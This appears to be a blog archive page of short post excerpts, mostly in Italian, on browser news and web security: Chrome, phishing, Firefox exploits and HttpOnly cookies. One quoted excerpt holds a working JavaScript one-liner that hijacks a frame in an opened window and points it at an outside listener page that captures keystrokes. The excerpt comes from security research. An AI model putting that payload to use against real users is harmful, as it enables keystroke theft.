about 11 months ago - 7 comments
Si sta molto leggendo in giro in merito al “nuovo” nato di casa Google che in questi giorni compie un anno di vita. Un anno di sviluppo e 3 major release alle spalle, certo la numerazione conta poco, ma non si può certo dire che in 12 mesi di cose non ne siano cambiate anzi.
about 1 year ago - No comments
E’ bello riavere milw0rm tra noi Firefox 3.5 Heap Spray Vulnerabilty Author: SBerry aka Simon Berry-Byrne Thanks to HD Moore for the insight and Metasploit for the payload Loremipsumdoloregkuw Loremipsumdoloregkuwiert Loremikdkw # milw0rm.com [2009-07-13] via Mozilla Firefox 3.5 (Font tags) Remote Buffer Overflow Exploit. Qui la PoC
about 1 year ago - 2 comments
Il phishing è uno dei fenomeni (di sicurezza) di massa che attualmente affligge il mondo dell’utenza internet, lo diceva due anni fa gartner ed oggi siamo proprio nella “mainstream adoption”: London, UK, September 18, 2006 — Gartner, Inc. today advised businesses to plan for five increasingly prevalent cyberthreats that have the potential to inflict significant
about 1 year ago - No comments
Mountain View (CA) – Google was widely speculated to sacrifice Mozilla’s existence, which it supports quite extensively, in its quest to launch another assault at Microsoft. The simple fact that Google is now pursuing its own browser could leave Mozilla scratching its head. And quite apparently, Mozilla has not quite figured out how its relationship
about 2 years ago - No comments
This way, we bypass IE’s protection and set our desired location without any problems. And the final exploit goes like this: javascript:x=open(‘http://hackademix.net/’);setInterval(function(){try{x.frames[0].location={toString:function(){return ‘http://www.sirdarckcat.net/caballero-listener.html’;}}}catch(e){}},5000);void(1); What caballero-listener does is just focusing itself, so it can catches onkeydown events.. there are a lot of ways of making the same thing in more stealth mode. Ghost Busters | GNUCITIZEN
about 2 years ago - No comments
David Ross had a good blog post a few weeks back about how IE8.0 is no longer vulnerable to the US-ASCII encoding attack. For those of you who don’t know what I’m talking about you can find an example of it on the charsets page. Looks like both of the browser manufacturers are stepping up
about 2 years ago - No comments
Sono oramai mesi che utilizzo Flock con somma soddisfazione. Certo non è il massimo e mentre stavo scrivendo queste due righe è schiantato, facendo un ottimo restore della sessione grazie a FF e riproponendomi la draft del post proprio dove l’avevo lasciata. Ma già mi assilla un tarlo: “Quando avremo una versione basata su Firefox
about 3 years ago - No comments
Exploit – Firefox 3 supporterà HttpOnly cookies: Per contrastare il Cross Site Scripting e gli attacchi basati su Javascript il nuovo browser di Mozilla, Firefox 3, implementerà il supporta HttpOnly già introdotto da Microsoft su Internet Explorer 6 SP1. (via Securiteam) In questo modo i cookie non potranno essere letti nè manipolati dal client per
about 3 years ago - No comments
Firefox 2.0.0.2 : Ancora pericolo phishing: Il problema nella protezione phishing segnalato su bugzilla nel mese di gennaio interessava Firefox 2.0.0.1. Con il rilascio della versione 2.0.0.2 sono state corrette importanti vulnerabilità di sicurezza ma il bug nella protezione phishing non è stato ancora risolto.
about 3 years ago - No comments
Garbage Collection in IE6: He tested this with a benchmarking function which creates 5000 object literals with random properties, and then sorts them. The following results show the mean execution time of the create-and-sort test as O increases for constant P=50 on Firefox 2.0 (red) and IE6 (blue) on the same computer. What can you
